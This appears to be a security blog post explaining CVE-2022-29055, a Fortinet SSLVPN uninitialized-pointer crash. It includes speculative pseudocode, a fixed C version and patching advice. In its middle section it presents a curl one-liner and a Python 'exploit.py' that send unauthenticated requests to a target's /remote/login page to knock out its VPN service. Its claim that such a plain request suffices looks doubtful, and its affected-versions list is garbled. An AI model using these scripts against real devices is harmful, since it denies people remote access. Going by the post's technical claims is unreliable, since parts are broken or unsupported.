In April 2022, a significant security vulnerability designated CVE-2022-29055 was discovered in several versions of Fortinet FortiOS and FortiProxy products. This vulnerability is serious as it allows anyone — whether or not they are logged in — to crash the SSLVPN service remotely through a specially crafted HTTP GET request. This blog post will break down what CVE-2022-29055 is, how it works under the hood, and why it’s so dangerous, using simple language and clear explanations.
What is the Vulnerability?
CVE-2022-29055 is a bug caused by accessing an uninitialized pointer in the SSLVPN daemon process. This happens when the program handles SSLVPN web requests without properly initializing or checking some objects in memory.
All 1.2.x releases
> Official Advisory:
> Fortinet PSIRT: Access of Uninitialized Pointer – SSLVPNd Crash
How Does It Happen?
The root of the problem lies in how the SSLVPN daemon (sslvpnd) processes HTTP GET requests. If the request takes a specific code path that the developers overlooked, the program attempts to use a pointer that was never set to a proper value.
In plain English:
This is like trying to use a phone that you never charged up — it simply won’t work, and in this case, it causes the program to “crash,” which stops or restarts the SSLVPN service.
Let’s imagine this process in stripped-down pseudocode (the types and the `find_session` declaration are added here only so the sketch compiles; the real sslvpnd structures are not public):

```c
#include <stddef.h>
#include <string.h>

typedef struct { int permissions; } Session;      // stand-in for the real session object
typedef struct { const char *cookie; } Connection; // stand-in for the real connection object
Session *find_session(const char *cookie);

// Vulnerable handler function in sslvpn binary
void handle_get_request(const char *url, Connection *conn) {
    Session *user_session = NULL;
    // Some logic that is supposed to set the user_session pointer, but it doesn't always happen
    if (strstr(url, "/remote/login")) {
        user_session = find_session(conn->cookie);
    }
    // But for other URLs (or when no session matches), user_session could remain NULL
    // Unconditionally dereferencing the pointer
    if (user_session->permissions) { // <-- CRASHES here if user_session is NULL!
        // ...
    }
    // ...
}
```
So, by sending a carefully crafted HTTP GET request to the vulnerable endpoint (for example, /remote/login without proper authentication or cookies), an attacker can make the program try to use (or read) a pointer that doesn’t point to anything.
> Key Point:
> The attacker doesn’t need to log in. Just a GET request made over the network can cause the crash.
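As an added example (not code from the original post or from Fortinet), here is the hardened counterpart of the sketch above: the session pointer is initialized on every path and checked before any dereference, so an unauthenticated or unknown-session request gets an error code instead of crashing the daemon. The `Session`/`Connection` structs, the one-entry `find_session` table and the cookie value are constructed stand-ins, not real sslvpnd internals.

```c
#include <stddef.h>
#include <string.h>

// Constructed stand-ins for the private sslvpnd structures (assumption)
typedef struct { int permissions; } Session;
typedef struct { const char *cookie; } Connection;

// Constructed one-entry session table: only this cookie maps to a session
static Session valid_session = { .permissions = 1 };

static Session *find_session(const char *cookie) {
    if (cookie != NULL && strcmp(cookie, "CONSTRUCTED-SESSION-COOKIE") == 0) {
        return &valid_session;
    }
    return NULL; // missing or unknown cookie: no session
}

// Result codes the hardened handler returns instead of crashing
enum { HANDLE_OK = 0, HANDLE_UNAUTHENTICATED = 401, HANDLE_NOT_FOUND = 404 };

// Hardened handler: every path either yields a valid pointer or bails out
int handle_get_request_fixed(const char *url, const Connection *conn) {
    if (url == NULL || conn == NULL) {
        return HANDLE_NOT_FOUND;          // malformed request, nothing to look up
    }
    Session *user_session = NULL;         // always initialized, never left dangling
    if (strstr(url, "/remote/login") != NULL) {
        user_session = find_session(conn->cookie);
    }
    // Check the pointer before every dereference: an unauthenticated request
    // (no cookie, bad cookie, or a URL that never sets the pointer) gets a
    // clean 401 rather than a NULL read that takes down the whole service.
    if (user_session == NULL) {
        return HANDLE_UNAUTHENTICATED;
    }
    if (!user_session->permissions) {
        return HANDLE_UNAUTHENTICATED;    // session exists but has no rights
    }
    return HANDLE_OK;
}
```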
Here’s a simple way to exploit CVE-2022-29055 using curl (a command-line HTTP client):

```sh
curl -k "https://<target-FortiOS-or-FortiProxy-IP>/remote/login"
```
This alone, when pointed at a vulnerable device, is sometimes enough to take down the SSLVPN service!
In a more advanced script (for automation), it can look like this in Python:

```python
import requests
import sys

if len(sys.argv) != 2:
    print("Usage: python3 exploit.py https://<host>")
    sys.exit(1)

target = sys.argv[1].rstrip('/')

try:
    # Unauthenticated GET request
    response = requests.get(target + '/remote/login', verify=False)
    print(f"Sent request, got status code {response.status_code}")
except Exception as e:
    print(f"Error: {e}")
```
Users will not be able to initiate new VPN sessions until the service restarts.
Note:
This is NOT a remote code execution (RCE) bug. It causes a denial of service (DoS), disrupting access and potentially aiding other attacks like brute forcing credentials or hiding a larger attack.
- Disruption of Business: Organizations relying on remote work are significantly disturbed.
- Potential Info Leak: Forced restarts may weaken other protections and indirectly help follow-up attacks.
Responsible Disclosure & Fix
Fortinet released patches and strongly recommended upgrading or mitigating.
References
- Official Fortinet Advisory – FG-IR-22-039
- VulnCheck Writeup on Exploitability
- NVD Details for CVE-2022-29055
How to Protect Yourself
1. Update Your FortiOS / FortiProxy:
Upgrade to a version listed as not vulnerable in the official Fortinet advisory.
2. Restrict Access:
Limit VPN web portal access to trusted IPs only, especially for the admin interface.
3. Monitor & Alert:
Watch for abnormal restarts or process crashes on the SSLVPNd service.
4. Temporary Mitigations:
If you can’t upgrade right away, consider disabling SSLVPN until you patch, or filtering unwanted HTTP requests at the network boundary.
Conclusion
CVE-2022-29055 shows that even a simple programming oversight — accessing a pointer that should have been checked or initialized — can have massive, real-world, business-wide impacts. If you manage Fortinet gear, patch now and secure your configs!
Further Reading
- Fortinet CVE-2022-29055 Advisory
- CVE Page at NIST
*This post is an original summary and educational analysis based on public advisories and technical field reports, intended to help IT professionals and security enthusiasts understand and address CVE-2022-29055.*
Timeline
Published on: 10/18/2022 15:15:00 UTC
Last modified on: 10/20/2022 19:13:00 UTC